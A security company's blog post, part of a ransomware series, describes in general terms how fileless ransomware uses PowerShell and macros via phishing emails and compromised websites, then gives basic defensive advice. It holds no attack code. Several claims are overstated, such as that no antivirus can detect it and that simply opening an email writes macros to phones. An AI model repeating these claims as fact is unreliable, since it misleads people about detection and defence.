Fileless Ransomware Infections – How Does This Really Work?

This is part three of five in a series on Ransomware that will discuss a new variation of ransomware (known as fileless ransomware), the most targeted verticals, how it works and what IT executives and administrators need to know to combat the ever-changing strains of ransomware.

There is a new variant of ransomware – it’s stealthy, nearly impossible to detect and is forcing more banks, telecommunication companies, government agencies and healthcare organizations globally to pay the ransom to cyber criminals. These attacks are known as fileless or non-malware ransomware and it leverages Microsoft’s PowerShell’s scripting language to target organizations through documents and/or applications that run through macros.

What is PowerShell?

PowerShell is a programming language designed to automate tasks on MS Windows operating environments and includes over 100 command line tools.

How does Fileless Ransomware Work with PowerShell?

Non-malware aka fileless ransomware (unlike traditional ransomware) does not use files to encrypt your data; instead it writes scripts/macros which derive from PowerShell to encrypt the files.

What are the two ways fileless ransomware can penetrate your systems:

Via Phishing Attacks: An email is opened on a device and automatically writes macros directly to your device’s (i.e. tablet, laptop, cellphone or desktop) memory which starts dictating commands of payment as well as encrypting your data.

Via Compromised Websites: An employee browses or visits a compromised/malicious website in which the cyber criminals write scripts to the computer’s RAM to capture some pertinent information which will then either ask for cryptocurrency or immediately encrypt your files.

Why is fileless ransomware unique?

Fileless malware is unique and difficult to detect because the malicious code is embedded into a native scripting language or written straight into the computer’s RAM, where it hides in isolated spots within the computer’s memory. It’s not written to disk nor does the malicious code rely on the hard drive to run these commands.

What are the problems associated with Fileless Ransomware?

  1. Fileless ransomware leaves little trace behind nor can it be detected with any antivirus software.
  2. This ransomware strain allows cyber criminals to have access to your systems, meaning that they can infiltrate your computers, steal your information and encrypt your files without your IT staff even knowing.  
  3. It can lead to more attacks. As the cyber criminals are writing scripts they’re also gathering as much data from the victim’s computer as possible.

What can end users do to protect themselves?

  1. BACKUP YOUR DATA. Monitor your systems frequently and backup regularly so you can revert back to specific points-in-time when you’re systems were free of malware and malicious attacks.
  2. BE VIGILANT. Disable all macros or do not open any files unless the end user is 100 per cent certain the file is not malicious. If there is any cause for concern, contact your MSP or IT administrator immediately.
  3. BLOCK all infected emails, pages, and communication with browsers and servers. Since the cybercriminals will write code to infect email and webpages, block anything that is odd, unfamiliar or sketchy.

Interested in learning how to keep your networks and systems protected against ransomware threats?


Topics Discussed

Related Posts

Why Backup is the Only Prevention from Ransomware This is part four of five in a series on Ransomware that will discuss the growth of ransomware,... 3 min read
Three Reasons Why Your 2017 IT Strategy Needs to Change This is part one of five in a series on Ransomware that will discuss what ransomware is, key... 4 min read